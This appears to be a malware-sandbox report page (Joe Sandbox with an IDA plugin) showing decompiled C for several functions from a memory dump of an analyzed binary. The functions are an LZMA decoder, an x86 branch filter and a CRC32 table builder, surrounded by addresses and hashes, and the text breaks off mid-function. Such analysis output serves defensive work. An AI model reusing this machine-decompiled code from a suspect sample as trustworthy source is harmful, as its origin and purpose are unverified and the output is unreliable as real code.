0x00416540
0x00416540
0x00416543
0x00416550
0x0041655c
0x0041655f
0x00416561
0x00416561
0x0041656a
0x0041656f
0x0041658b
0x0041658d
0x00416596
0x0041659e
0x00416571
0x00416571
0x0041657f
0x00416587
0x00416587
0x004165a1

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e2a2f0d0f42b76f4f6b833c13a8ac4c9f948a915a86b73f9f3c18f8ea78656a
Instruction ID: 92b0058b6c51223ae47e38f67aaa658f5591a3405ca94f54e0ce24afd9087662
Opcode Fuzzy Hash: 5e2a2f0d0f42b76f4f6b833c13a8ac4c9f948a915a86b73f9f3c18f8ea78656a
Instruction Fuzzy Hash: 5A021973A087508BD714CE19CD802A9B7E3FFD1390F6B462EE89647384DAB4D986C749

Uniqueness

Uniqueness Score: -1.00%

Function 00416C70, Relevance: .5, Instructions: 480
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00416C70(void* __eax, signed char* __ecx, signed char* _a4) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed char* _v20;
				intOrPtr _t158;
				unsigned int _t162;
				signed int _t165;
				signed int _t166;
				intOrPtr _t167;
				signed int _t168;
				signed int _t169;
				signed char* _t170;
				signed int _t172;
				signed char* _t173;
				signed char* _t176;
				signed char* _t178;
				signed char* _t180;
				signed char _t191;
				signed int _t192;
				unsigned int _t198;
				signed char* _t199;
				signed int _t204;
				signed char* _t205;
				signed char* _t207;
				signed int _t213;
				signed short* _t214;
				signed int _t215;
				signed int _t222;
				signed char _t228;
				signed int _t229;
				signed int _t235;
				signed char* _t237;
				signed int _t240;
				signed int _t244;
				signed int _t247;
				signed int _t250;
				signed int _t253;
				signed int _t256;
				signed int _t259;
				signed char _t263;
				void* _t264;
				intOrPtr _t265;
				signed int _t267;
				signed char _t279;
				signed char _t284;
				signed int _t285;
				signed int _t286;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				signed char* _t297;
				intOrPtr _t298;
				signed char* _t299;
				signed short* _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed char* _t306;
				signed int _t309;
				signed int _t316;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t342;
				signed int _t343;
				signed char _t344;
				void* _t348;
				signed int _t349;

				_t297 = __ecx;
				_t342 =  *(__ecx + 0x40);
				_t288 =  *(__ecx + 0x20);
				_t323 =  *(__ecx + 0x24);
				_t158 =  *((intOrPtr*)(__ecx + 0xc));
				_v20 =  &(_a4[__eax]);
				_v16 = _t158;
				_t213 = ((0x00000001 <<  *(__ecx + 2)) - 0x00000001 &  *(__ecx + 0x28)) << 4;
				_t235 = 1 + _t342;
				_v4 = _t235;
				_v12 =  *(_t158 + _t235 * 2 - 0x200) & 0x0000ffff;
				if(_t288 >= 0x1000000) {
					L4:
					_t162 = (_t288 >> 0xb) * _v12;
					if(_t323 >= _t162) {
						_t298 = _v16;
						_t289 = _t288 - _t162;
						_t324 = _t323 - _t162;
						_v12 =  *(_t298 + 0x20 + _t342 * 2) & 0x0000ffff;
						_t237 = _a4;
						if(_t289 >= 0x1000000) {
							L39:
							_t165 = (_t289 >> 0xb) * _v12;
							if(_t324 >= _t165) {
								_t290 = _t289 - _t165;
								_t325 = _t324 - _t165;
								_t166 =  *(_t298 + 0x38 + _t342 * 2) & 0x0000ffff;
								_v8 = 3;
								if(_t290 >= 0x1000000) {
									L44:
									_t240 = (_t290 >> 0xb) * _t166;
									_t167 = _v16;
									if(_t325 >= _t240) {
										_t299 = _a4;
										_t291 = _t290 - _t240;
										_t326 = _t325 - _t240;
										_v12 =  *(_t167 + 0x50 + _t342 * 2) & 0x0000ffff;
										if(_t291 >= 0x1000000) {
											L55:
											_t244 = (_t291 >> 0xb) * _v12;
											if(_t326 >= _t244) {
												_t168 =  *(_t167 + 0x68 + _t342 * 2) & 0x0000ffff;
												_t292 = _t291 - _t244;
												_t325 = _t326 - _t244;
												if(_t292 >= 0x1000000) {
													L60:
													_t247 = (_t292 >> 0xb) * _t168;
													if(_t325 >= _t247) {
														goto L62;
													} else {
														_t293 = _t247;
													}
													goto L63;
												} else {
													if(_t299 >= _v20) {
														goto L2;
													} else {
														_t292 = _t292 << 8;
														_t325 = _t325 << 0x00000008 |  *_t299 & 0x000000ff;
														_a4 =  &(_t299[1]);
														goto L60;
													}
												}
											} else {
												_t293 = _t244;
												goto L63;
											}
										} else {
											if(_t299 >= _v20) {
												goto L2;
											} else {
												_t291 = _t291 << 8;
												_t326 = _t326 << 0x00000008 |  *_t299 & 0x000000ff;
												_t299 =  &(_t299[1]);
												_a4 = _t299;
												goto L55;
											}
										}
									} else {
										_t316 =  *(_t167 + _v4 * 2 - 0xc00) & 0x0000ffff;
										_t180 = _a4;
										_t292 = _t240;
										if(_t240 >= 0x1000000) {
											L48:
											_t247 = (_t292 >> 0xb) * _t316;
											if(_t325 >= _t247) {
												L62:
												_t293 = _t292 - _t247;
												_t325 = _t325 - _t247;
												L63:
												_t237 = _a4;
												_v4 = 0xc;
												_t301 = _v16 + 0xfffff600;
												goto L64;
											} else {
												if(_t247 >= 0x1000000 || _t180 < _v20) {
													return 3;
												} else {
													goto L2;
												}
											}
										} else {
											if(_t180 >= _v20) {
												goto L2;
											} else {
												_t292 = _t240 << 8;
												_t325 = _t325 << 0x00000008 |  *_t180 & 0x000000ff;
												_t180 =  &(_t180[1]);
												_a4 = _t180;
												goto L48;
											}
										}
									}
								} else {
									if(_t237 >= _v20) {
										goto L2;
									} else {
										_t290 = _t290 << 8;
										_t325 = _t325 << 0x00000008 |  *_t237 & 0x000000ff;
										_a4 =  &(_t237[1]);
										goto L44;
									}
								}
							} else {
								_t293 = _t165;
								_v4 = 0;
								_t301 = _t298 + 0xfffffa00;
								_v8 = 2;
								L64:
								_t169 =  *_t301 & 0x0000ffff;
								if(_t293 >= 0x1000000) {
									L67:
									_t250 = (_t293 >> 0xb) * _t169;
									_t170 = _a4;
									if(_t325 >= _t250) {
										_t343 = _t301[8] & 0x0000ffff;
										_t294 = _t293 - _t250;
										_t327 = _t325 - _t250;
										if(_t294 >= 0x1000000) {
											L72:
											_t253 = (_t294 >> 0xb) * _t343;
											if(_t327 >= _t253) {
												_t295 = _t294 - _t253;
												_t327 = _t327 - _t253;
												_t214 =  &(_t301[0x100]);
												_t344 = 0x10;
												_v12 = 0x100;
											} else {
												_t344 = 8;
												_t295 = _t253;
												_t214 = _t301 + 0x10 + _t213 * 2;
												_v12 = 8;
											}
											goto L75;
										} else {
											if(_t170 >= _v20) {
												goto L2;
											} else {
												_t294 = _t294 << 8;
												_t327 = _t327 << 0x00000008 |  *_t170 & 0x000000ff;
												_t170 =  &(_t170[1]);
												_a4 = _t170;
												goto L72;
											}
										}
									} else {
										_t295 = _t250;
										_t214 =  &(_t301[_t213]);
										_t344 = 0;
										_v12 = 8;
										L75:
										_t302 = 1;
										L76:
										while(1) {
											if(_t295 >= 0x1000000) {
												L79:
												_t256 = (_t295 >> 0xb) * (_t214[_t302] & 0x0000ffff);
												if(_t327 >= _t256) {
													_t295 = _t295 - _t256;
													_t327 = _t327 - _t256;
													_t302 = _t302 + _t302 + 1;
												} else {
													_t295 = _t256;
													_t302 = _t302 + _t302;
												}
												_t172 = _v12;
												if(_t302 >= _t172) {
													_t303 = _t302 + _t344 - _t172;
													if(_v4 >= 4) {
														goto L32;
													} else {
														if(_t303 >= 3) {
															_t303 = 3;
														}
														_t173 = _a4;
														_t129 = _t303 + 1; // 0x4
														_t348 = (_t129 << 7) + _v16;
														_t304 = 1;
														do {
															_t215 =  *(_t348 + _t304 * 2) & 0x0000ffff;
															if(_t295 >= 0x1000000) {
																goto L91;
															} else {
																_t176 = _a4;
																if(_t176 >= _v20) {
																	goto L2;
																} else {
																	_t295 = _t295 << 8;
																	_t327 = _t327 << 0x00000008 |  *_t176 & 0x000000ff;
																	_t173 =  &(_t176[1]);
																	_a4 = _t173;
																	goto L91;
																}
															}
															goto L113;
															L91:
															_t259 = (_t295 >> 0xb) * _t215;
															if(_t327 >= _t259) {
																_t295 = _t295 - _t259;
																_t327 = _t327 - _t259;
																_t304 = _t304 + _t304 + 1;
															} else {
																_t295 = _t259;
																_t304 = _t304 + _t304;
															}
														} while (_t304 < 0x40);
														_t305 = _t304 - 0x40;
														if(_t305 < 4) {
															goto L33;
														} else {
															_t263 = (_t305 >> 1) - 1;
															_v12 = _t263;
															if(_t305 >= 0xe) {
																_t306 = _v20;
																_t264 = _t263 - 4;
																do {
																	if(_t295 >= 0x1000000) {
																		goto L102;
																	} else {
																		if(_t173 >= _t306) {
																			goto L2;
																		} else {
																			_t295 = _t295 << 8;
																			_t327 = _t327 << 0x00000008 |  *_t173 & 0x000000ff;
																			_t173 =  &(_t173[1]);
																			goto L102;
																		}
																	}
																	goto L113;
																	L102:
																	_t295 = _t295 >> 1;
																	_t327 = _t327 - ((_t327 - _t295 >> 0x0000001f) - 0x00000001 & _t295);
																	_t264 = _t264 - 1;
																} while (_t264 != 0);
																_t265 = _v16;
																_a4 = _t173;
																_v12 = 4;
																goto L104;
															} else {
																_t265 = _v16 + ((_t305 & 0x00000001 | 0x00000002) << _t263) * 2 - 0xd00;
																L104:
																_t349 = 1;
																_v16 = _t265;
																_t222 = 1;
																do {
																	_t267 =  *(_v16 + _t349 * 2) & 0x0000ffff;
																	if(_t295 >= 0x1000000) {
																		goto L108;
																	} else {
																		if(_a4 >= _v20) {
																			goto L2;
																		} else {
																			_t178 = _a4;
																			_t295 = _t295 << 8;
																			_t327 = _t327 << 0x00000008 |  *_t178 & 0x000000ff;
																			_t173 =  &(_t178[1]);
																			_a4 = _t173;
																			goto L108;
																		}
																	}
																	goto L113;
																	L108:
																	_t309 = (_t295 >> 0xb) * _t267;
																	if(_t327 >= _t309) {
																		_t222 = _t222 + _t222;
																		_t295 = _t295 - _t309;
																		_t327 = _t327 - _t309;
																		_t349 = _t349 + _t222;
																	} else {
																		_t349 = _t349 + _t222;
																		_t295 = _t309;
																		_t222 = _t222 + _t222;
																	}
																	_t155 =  &_v12;
																	 *_t155 = _v12 - 1;
																} while ( *_t155 != 0);
																goto L33;
															}
														}
													}
												} else {
													_t170 = _a4;
													continue;
												}
											} else {
												if(_t170 >= _v20) {
													goto L2;
												} else {
													_t295 = _t295 << 8;
													_t327 = _t327 << 0x00000008 |  *_t170 & 0x000000ff;
													_a4 =  &(_t170[1]);
													goto L79;
												}
											}
											goto L113;
										}
									}
								} else {
									if(_t237 >= _v20) {
										goto L2;
									} else {
										_t293 = _t293 << 8;
										_t325 = _t325 << 0x00000008 |  *_t237 & 0x000000ff;
										_a4 =  &(_t237[1]);
										goto L67;
									}
								}
							}
						} else {
							if(_t237 >= _v20) {
								goto L2;
							} else {
								_t289 = _t289 << 8;
								_t324 = _t324 << 0x00000008 |  *_t237 & 0x000000ff;
								_t237 =  &(_t237[1]);
								_a4 = _t237;
								goto L39;
							}
						}
					} else {
						_t296 = _t162;
						_v16 = _v16 + 0x280;
						if(_t297[0x2c] != 0 || _t297[0x28] != 0) {
							_t279 = _t297[0x18];
							if(_t279 == 0) {
								_t279 = _t297[0x14];
							}
							_v16 = _v16 + ((( *(_t297[0x10] + _t279 - 1) & 0x000000ff) >> 8 - ( *_t297 & 0x000000ff)) + (((0x00000001 << _t297[1]) - 0x00000001 & _t297[0x28]) << ( *_t297 & 0x000000ff))) * 0x600;
						}
						if(_t342 >= 7) {
							_t284 = _t297[0x18];
							_t228 = _t297[0x30];
							if(_t284 >= _t228) {
								_t191 = 0;
							} else {
								_t191 = _t297[0x14];
							}
							_t229 =  *(_t297[0x10] - _t228 + _t284 + _t191) & 0x000000ff;
							_t321 = 0x100;
							_t285 = 1;
							do {
								_t192 = _t321;
								_t229 = _t229 + _t229;
								_v4 = _t192;
								_t321 = _t321 & _t229;
								_v12 =  *(_v16 + (_t192 + _t285 + _t321) * 2) & 0x0000ffff;
								if(_t296 >= 0x1000000) {
									goto L27;
								} else {
									_t199 = _a4;
									if(_t199 >= _v20) {
										goto L2;
									} else {
										_t296 = _t296 << 8;
										_t323 = _t323 << 0x00000008 |  *_t199 & 0x000000ff;
										_a4 =  &(_t199[1]);
										goto L27;
									}
								}
								goto L113;
								L27:
								_t198 = (_t296 >> 0xb) * _v12;
								if(_t323 >= _t198) {
									_t296 = _t296 - _t198;
									_t323 = _t323 - _t198;
									_t285 = _t285 + _t285 + 1;
								} else {
									_t285 = _t285 + _t285;
									_t321 = _t321 ^ _v4;
									_t296 = _t198;
								}
							} while (_t285 < 0x100);
							goto L31;
						} else {
							_t286 = 1;
							do {
								_t322 =  *(_v16 + _t286 * 2) & 0x0000ffff;
								if(_t296 >= 0x1000000) {
									goto L15;
								} else {
									_t205 = _a4;
									if(_t205 >= _v20) {
										goto L2;
									} else {
										_t296 = _t296 << 8;
										_t323 = _t323 << 0x00000008 |  *_t205 & 0x000000ff;
										_a4 =  &(_t205[1]);
										goto L15;
									}
								}
								goto L113;
								L15:
								_t204 = (_t296 >> 0xb) * _t322;
								if(_t323 >= _t204) {
									_t296 = _t296 - _t204;
									_t323 = _t323 - _t204;
									_t286 = _t286 + _t286 + 1;
								} else {
									_t296 = _t204;
									_t286 = _t286 + _t286;
								}
							} while (_t286 < 0x100);
							L31:
							_v8 = 1;
							L32:
							_t173 = _a4;
							L33:
							if(_t295 >= 0x1000000 || _t173 < _v20) {
								return _v8;
							} else {
								goto L2;
							}
						}
					}
				} else {
					_t207 = _a4;
					if(_t207 < _v20) {
						_t288 = _t288 << 8;
						_t323 = _t323 << 0x00000008 |  *_t207 & 0x000000ff;
						_a4 =  &(_t207[1]);
						goto L4;
					} else {
						L2:
						return 0;
					}
				}
				L113:
			}

0x00416c77
0x00416c7d
0x00416c80
0x00416c83
0x00416c88
0x00416c8b
0x00416c99
0x00416ca1
0x00416ca4
0x00416caf
0x00416cb3
0x00416cbd
0x00416ce5
0x00416cea
0x00416cf1
0x00416e75
0x00416e7e
0x00416e80
0x00416e82
0x00416e86
0x00416e90
0x00416eac
0x00416eb1
0x00416eb8
0x00416ed7
0x00416ed9
0x00416edb
0x00416ee0
0x00416eee
0x00416f0a
0x00416f0f
0x00416f12
0x00416f18
0x00416f81
0x00416f85
0x00416f87
0x00416f8e
0x00416f98
0x00416fb4
0x00416fb9
0x00416fc0
0x00416fc6
0x00416fcb
0x00416fcd
0x00416fd5
0x00416ff1
0x00416ff6
0x00416ffb
0x00000000
0x00416ffd
0x00416ffd
0x00416ffd
0x00000000
0x00416fd7
0x00416fdb
0x00000000
0x00416fe1
0x00416fe7
0x00416fea
0x00416fed
0x00000000
0x00416fed
0x00416fdb
0x00416fc2
0x00416fc2
0x00000000
0x00416fc2
0x00416f9a
0x00416f9e
0x00000000
0x00416fa4
0x00416faa
0x00416fad
0x00416faf
0x00416fb0
0x00000000
0x00416fb0
0x00416f9e
0x00416f1a
0x00416f1e
0x00416f26
0x00416f2a
0x00416f32
0x00416f50
0x00416f55
0x00416f5a
0x00417001
0x00417001
0x00417003
0x00417005
0x00417009
0x0041700d
0x00417015
0x00000000
0x00416f60
0x00416f66
0x00416f7e
0x00000000
0x00000000
0x00000000
0x00416f66
0x00416f34
0x00416f38
0x00000000
0x00416f3e
0x00416f41
0x00416f49
0x00416f4b
0x00416f4c
0x00000000
0x00416f4c
0x00416f38
0x00416f32
0x00416ef0
0x00416ef4
0x00000000
0x00416efa
0x00416f00
0x00416f03
0x00416f06
0x00000000
0x00416f06
0x00416ef4
0x00416eba
0x00416eba
0x00416ebc
0x00416ec4
0x00416eca
0x0041701b
0x0041701b
0x00417024
0x00417040
0x00417045
0x00417048
0x0041704e
0x00417061
0x00417065
0x00417067
0x0041706f
0x0041708b
0x00417090
0x00417095
0x004170a8
0x004170aa
0x004170ac
0x004170b2
0x004170b7
0x00417097
0x00417097
0x0041709c
0x0041709e
0x004170a2
0x004170a2
0x00000000
0x00417071
0x00417075
0x00000000
0x0041707b
0x00417081
0x00417084
0x00417086
0x00417087
0x00000000
0x00417087
0x00417075
0x00417050
0x00417050
0x00417052
0x00417055
0x00417057
0x004170bf
0x004170bf
0x00000000
0x004170c4
0x004170ca
0x004170e6
0x004170ef
0x004170f4
0x004170fc
0x004170fe
0x00417100
0x004170f6
0x004170f6
0x004170f8
0x004170f8
0x00417104
0x0041710a
0x00417114
0x0041711b
0x00000000
0x00417121
0x00417124
0x00417126
0x00417126
0x0041712b
0x0041712f
0x00417135
0x00417139
0x00417140
0x00417140
0x0041714b
0x00000000
0x0041714d
0x0041714d
0x00417155
0x00000000
0x0041715b
0x00417161
0x00417164
0x00417166
0x00417167
0x00000000
0x00417167
0x00417155
0x00000000
0x0041716b
0x00417170
0x00417175
0x0041717d
0x0041717f
0x00417181
0x00417177
0x00417177
0x00417179
0x00417179
0x00417185
0x0041718a
0x00417190
0x00000000
0x00417196
0x0041719a
0x0041719b
0x004171a2
0x004171b9
0x004171bd
0x004171c0
0x004171c6
0x00000000
0x004171c8
0x004171ca
0x00000000
0x004171d0
0x004171d6
0x004171d9
0x004171db
0x00000000
0x004171db
0x004171ca
0x00000000
0x004171dc
0x004171dc
0x004171e8
0x004171ea
0x004171ea
0x004171ed
0x004171f1
0x004171f5
0x00000000
0x004171a4
0x004171b0
0x004171fd
0x004171fd
0x00417202
0x00417206
0x00417210
0x00417214
0x0041721e
0x00000000
0x00417220
0x00417228
0x00000000
0x0041722e
0x0041722e
0x00417238
0x0041723b
0x0041723d
0x0041723e
0x00000000
0x0041723e
0x00417228
0x00000000
0x00417242
0x00417247
0x0041724c
0x00417256
0x00417258
0x0041725a
0x0041725c
0x0041724e
0x0041724e
0x00417250
0x00417252
0x00417252
0x0041725e
0x0041725e
0x0041725e
0x00000000
0x00417264
0x004171a2
0x00417190
0x0041710c
0x0041710c
0x00000000
0x0041710c
0x004170cc
0x004170d0
0x00000000
0x004170d6
0x004170dc
0x004170df
0x004170e2
0x00000000
0x004170e2
0x004170d0
0x00000000
0x004170ca
0x004170c4
0x00417026
0x0041702a
0x00000000
0x00417030
0x00417036
0x00417039
0x0041703c
0x00000000
0x0041703c
0x0041702a
0x00417024
0x00416e92
0x00416e96
0x00000000
0x00416e9c
0x00416ea2
0x00416ea5
0x00416ea7
0x00416ea8
0x00000000
0x00416ea8
0x00416e96
0x00416cf7
0x00416cf7
0x00416d06
0x00416d0a
0x00416d12
0x00416d17
0x00416d19
0x00416d19
0x00416d4b
0x00416d4b
0x00416d52
0x00416db5
0x00416db8
0x00416dbd
0x00416dc4
0x00416dbf
0x00416dbf
0x00416dbf
0x00416dcd
0x00416dd1
0x00416dd6
0x00416de0
0x00416de4
0x00416de6
0x00416de8
0x00416dee
0x00416df7
0x00416e01
0x00000000
0x00416e03
0x00416e03
0x00416e0b
0x00000000
0x00416e11
0x00416e17
0x00416e1a
0x00416e1d
0x00000000
0x00416e1d
0x00416e0b
0x00000000
0x00416e21
0x00416e26
0x00416e2d
0x00416e39
0x00416e3b
0x00416e3d
0x00416e2f
0x00416e2f
0x00416e31
0x00416e35
0x00416e35
0x00416e41
0x00000000
0x00416d54
0x00416d54
0x00416d60
0x00416d64
0x00416d6e
0x00000000
0x00416d70
0x00416d70
0x00416d78
0x00000000
0x00416d7e
0x00416d84
0x00416d87
0x00416d8a
0x00000000
0x00416d8a
0x00416d78
0x00000000
0x00416d8e
0x00416d93
0x00416d98
0x00416da0
0x00416da2
0x00416da4
0x00416d9a
0x00416d9a
0x00416d9c
0x00416d9c
0x00416da8
0x00416e49
0x00416e49
0x00416e51
0x00416e51
0x00416e55
0x00416e5b
0x00416e72
0x00000000
0x00000000
0x00000000
0x00416e5b
0x00416d52
0x00416cbf
0x00416cbf
0x00416cc7
0x00416cdb
0x00416cde
0x00416ce1
0x00000000
0x00416ccc
0x00416ccc
0x00416cd2
0x00416cd2
0x00416cc7
0x00000000

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5ab2d6071ba4f626031de446fa0850a734d69f202f19f46ab4dd51ed20a1283
Instruction ID: 749a3237d7bda78a09f8de8b64832c24e1c15a66796a84742980e8518d2f9ae4
Opcode Fuzzy Hash: b5ab2d6071ba4f626031de446fa0850a734d69f202f19f46ab4dd51ed20a1283
Instruction Fuzzy Hash: F9021D72A083118BC709CE28C5802B9BBE2FBC5355F150B2FE49697754D778D8C9CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00413ED0, Relevance: .1, Instructions: 143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00413ED0(intOrPtr __ecx, void* __edx, intOrPtr _a4, unsigned int* _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _t43;
				unsigned int _t44;
				signed int _t48;
				intOrPtr _t52;
				signed char _t63;
				signed int _t64;
				signed char _t77;
				signed int* _t81;
				unsigned int _t84;
				void* _t86;
				unsigned int _t88;
				signed int _t91;
				intOrPtr _t97;
				void* _t98;

				_t97 = __ecx;
				_t84 = 0;
				_t88 =  *_a8 & 0x00000007;
				_v8 = __ecx;
				if(__edx >= 5) {
					_a4 = _a4 + 5;
					_t52 = __edx - 4 + __ecx;
					_v4 = _t52;
					while(1) {
						_t81 = _t84 + _t97;
						if(_t81 >= _t52) {
							goto L7;
						}
						L5:
						while(( *_t81 & 0x000000fe) != 0xe8) {
							_t81 =  &(_t81[0]);
							if(_t81 < _t52) {
								continue;
							}
							goto L7;
						}
						L7:
						_t63 = _t81 - _t84 - _t97;
						_t86 = _t81 - _t97;
						if(_t81 < _t52) {
							if(_t63 <= 2) {
								_t91 = _t88 >> _t63;
								if(_t91 == 0 || _t91 <= 4 && _t91 != 3 && ((( &(_t81[0]))[_t91 >> 1] & 0x000000ff) + 0x00000001 & 0x000000fe) != 0) {
									goto L10;
								} else {
									_t88 = (_t91 | 0x00000008) >> 1;
									_t84 = _t86 + 1;
									continue;
								}
							} else {
								_t91 = 0;
								L10:
								_t64 = _t81[1] & 0x000000ff;
								if((_t64 + 0x00000001 & 0x000000fe) != 0) {
									_t97 = _v8;
									_t88 = (_t91 | 0x00000008) >> 1;
									_t84 = _t86 + 1;
								} else {
									_t43 = _t81[0] & 0x000000ff | ((_t64 << 0x00000008 | _t81[0] & 0x000000ff) << 0x00000008 | _t81[0] & 0x000000ff) << 0x00000008;
									_t98 = _t86 + _a4;
									_t84 = _t86 + 5;
									if(_a12 == 0) {
										_t44 = _t43 - _t98;
									} else {
										_t44 = _t43 + _t98;
									}
									if(_t91 != 0) {
										_t77 = (_t91 & 0x00000006) + (_t91 & 0x00000006) + (_t91 & 0x00000006) + (_t91 & 0x00000006);
										if(((_t44 >> _t77) + 0x00000001 & 0x000000fe) == 0) {
											_t48 = _t44 ^ (0x00000100 << _t77) - 0x00000001;
											if(_a12 == 0) {
												_t44 = _t48 - _t98;
											} else {
												_t44 = _t48 + _t98;
											}
										}
										_t52 = _v4;
										_t88 = 0;
									}
									_t97 = _v8;
									_t81[0] = _t44;
									_t81[0] = _t44 >> 8;
									_t81[0] = _t44 >> 0x10;
									_t81[1] =  ~(_t44 >> 0x00000018 & 0x00000001);
								}
								while(1) {
									_t81 = _t84 + _t97;
									if(_t81 >= _t52) {
										goto L7;
									}
									goto L5;
								}
							}
						}
						if(_t63 <= 2) {
							 *_a8 = _t88 >> _t63;
							return _t86;
						} else {
							 *_a8 = 0;
							return _t86;
						}
						goto L30;
					}
				} else {
					return 0;
				}
				L30:
			}

0x00413edc
0x00413ede
0x00413ee0
0x00413ee3
0x00413eea
0x00413ef7
0x00413f00
0x00413f02
0x00413f06
0x00413f06
0x00413f0b
0x00000000
0x00000000
0x00000000
0x00413f10
0x00413f1a
0x00413f1d
0x00000000
0x00000000
0x00000000
0x00413f1d
0x00413f1f
0x00413f25
0x00413f27
0x00413f2b
0x00413f34
0x00413f77
0x00413f7b
0x00000000
0x00413f95
0x00413f98
0x00413f9a
0x00000000
0x00413f9a
0x00413f36
0x00413f36
0x00413f38
0x00413f38
0x00413f41
0x00413ffc
0x00414003
0x00414005
0x00413f47
0x00413f60
0x00413f66
0x00413f69
0x00413f71
0x00413fa0
0x00413f73
0x00413f73
0x00413f73
0x00413fa4
0x00413faf
0x00413fb7
0x00413fc1
0x00413fc8
0x00413fce
0x00413fca
0x00413fca
0x00413fca
0x00413fc8
0x00413fd0
0x00413fd4
0x00413fd4
0x00413fd6
0x00413fdf
0x00413fe2
0x00413ff1
0x00413ff4
0x00413ff4
0x00413f06
0x00413f06
0x00413f0b
0x00000000
0x00000000
0x00000000
0x00413f0b
0x00413f06
0x00413f34
0x0041400f
0x0041402d
0x00414034
0x00414011
0x0041401a
0x00414021
0x00414021
0x00000000
0x0041400f
0x00413eee
0x00413ef4
0x00413ef4
0x00000000

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b31d452cf4fc038398579975b7917bb1ff375609163340ad82824380036c8528
Instruction ID: c73478d6d2dc94b6e0038562b2afcca53e437786cb5e4ec297cf3cc6dfcd3039
Opcode Fuzzy Hash: b31d452cf4fc038398579975b7917bb1ff375609163340ad82824380036c8528
Instruction Fuzzy Hash: F1416833E043224BC7148E1C48942BAFBA1ABD1326F09476FD99687381D2249E8EC3D5

Uniqueness

Uniqueness Score: -1.00%

Function 00403101, Relevance: .1, Instructions: 97
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00403101() {
				void* _t43;
				void* _t45;
				unsigned int _t83;
				void* _t84;

				_t83 = 0;
				do {
					 *(0x41f3e0 + _t83 * 4) =  ~(( ~(( ~(( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 